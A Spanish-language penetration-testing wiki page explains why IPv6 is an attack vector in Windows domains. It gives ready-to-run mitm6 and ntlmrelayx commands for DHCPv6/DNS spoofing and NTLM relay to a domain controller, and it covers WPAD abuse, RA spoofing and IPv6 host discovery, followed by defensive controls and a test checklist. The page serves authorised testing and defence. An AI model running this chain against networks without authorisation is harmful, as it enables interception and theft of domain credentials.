Ataques IPv6
IPv6 está activado por defecto en Windows y en muchos sistemas modernos, pero casi nadie lo configura, lo filtra ni lo monitoriza. Esa combinación —presente pero desatendido— lo convierte en un vector excelente: el atacante usa IPv6 para hacerse pasar por el servidor DHCPv6/DNS de la red, interceptar tráfico y, en entornos Windows, montar una de las cadenas de compromiso de AD más fiables (mitm6 + ntlmrelayx). “No usamos IPv6” no significa que esté apagado.
Por qué es un vector tan bueno
Sección titulada «Por qué es un vector tan bueno»Los hosts Windows prefieren IPv6 sobre IPv4 y, al arrancar, buscan configuración IPv6 (DHCPv6) y resuelven nombres. Si nadie responde legítimamente por IPv6 (lo normal en redes “solo IPv4”), el atacante responde el primero y se convierte en el DNS/gateway IPv6 de las víctimas —sin tocar la configuración IPv4 existente, de forma sigilosa.
Red Team — mitm6 + relay (la cadena estrella en AD)
Sección titulada «Red Team — mitm6 + relay (la cadena estrella en AD)»# 1) mitm6 responde a las solicitudes DHCPv6 -> se hace DNS IPv6 de las víctimasmitm6 -d target.local# 2) ntlmrelayx recibe la autenticación y la relaya (LDAP/SMB/AD CS)ntlmrelayx.py -6 -t ldaps://dc.target.local -wh fakewpad.target.local --delegate-access# resultado: las víctimas autentican contra el atacante -> relay -> RBCD/creds (ver ad-ntlm)Combinado con WPAD (proxy automático), fuerza a los navegadores/servicios a autenticarse → captura/relay de credenciales de dominio. Es la cadena documentada por Dirk-jan Mollema y una de las más efectivas para pasar de “estoy en la LAN” a comprometer el dominio.
Otros ataques IPv6
Sección titulada «Otros ataques IPv6»# Router Advertisement (RA) spoofing: hacerse pasar por el router IPv6# -> MITM de tráfico IPv6 (similar a ARP spoofing en IPv4)# herramientas: THC-IPv6 (fake_router6, parasite6, etc.)# descubrimiento de hosts IPv6 (el espacio es enorme -> por multicast/vecindad)ping6 ff02::1%eth0 # todos los nodos del enlacenmap -6 <dirección>El espacio de direcciones IPv6 es gigantesco, así que el escaneo por fuerza bruta no sirve; se descubre por multicast de enlace local, NDP y registros DNS.
Para la defensa
Sección titulada «Para la defensa»- Si no usas IPv6, deshabilítalo correctamente (no basta con ignorarlo) o fíltralo.
- RA Guard y DHCPv6 Guard en switches: bloquean RA/DHCPv6 no autorizados (corta mitm6/RA spoofing).
- Deshabilitar WPAD (entrada DNS
wpad) y, en AD, LLMNR/NBT-NS (ver LLMNR / NBT-NS / mDNS Poisoning). - Forzar SMB/LDAP signing + channel binding: rompe el relay aunque capturen la autenticación (ver NTLM Relay).
- Monitorizar DHCPv6/NDP anómalo y autenticaciones hacia hosts inesperados.
- Tratar IPv6 con los mismos controles que IPv4 (firewall, segmentación, monitorización): la paridad es la clave.
Checklist de prueba
Sección titulada «Checklist de prueba»- ¿IPv6 activo en los hosts (aunque “no se use”)?
- mitm6 para hacerse DNS IPv6 de las víctimas
- ntlmrelayx -6 hacia LDAP/SMB/AD CS (ver NTLM Relay)
- WPAD para forzar autenticación
- RA spoofing / THC-IPv6 para MITM IPv6
- Descubrimiento de hosts IPv6 (multicast/NDP)
- Blue: ¿RA Guard/DHCPv6 Guard, signing, IPv6 filtrado?
- Documentar la cadena hasta el impacto (dominio)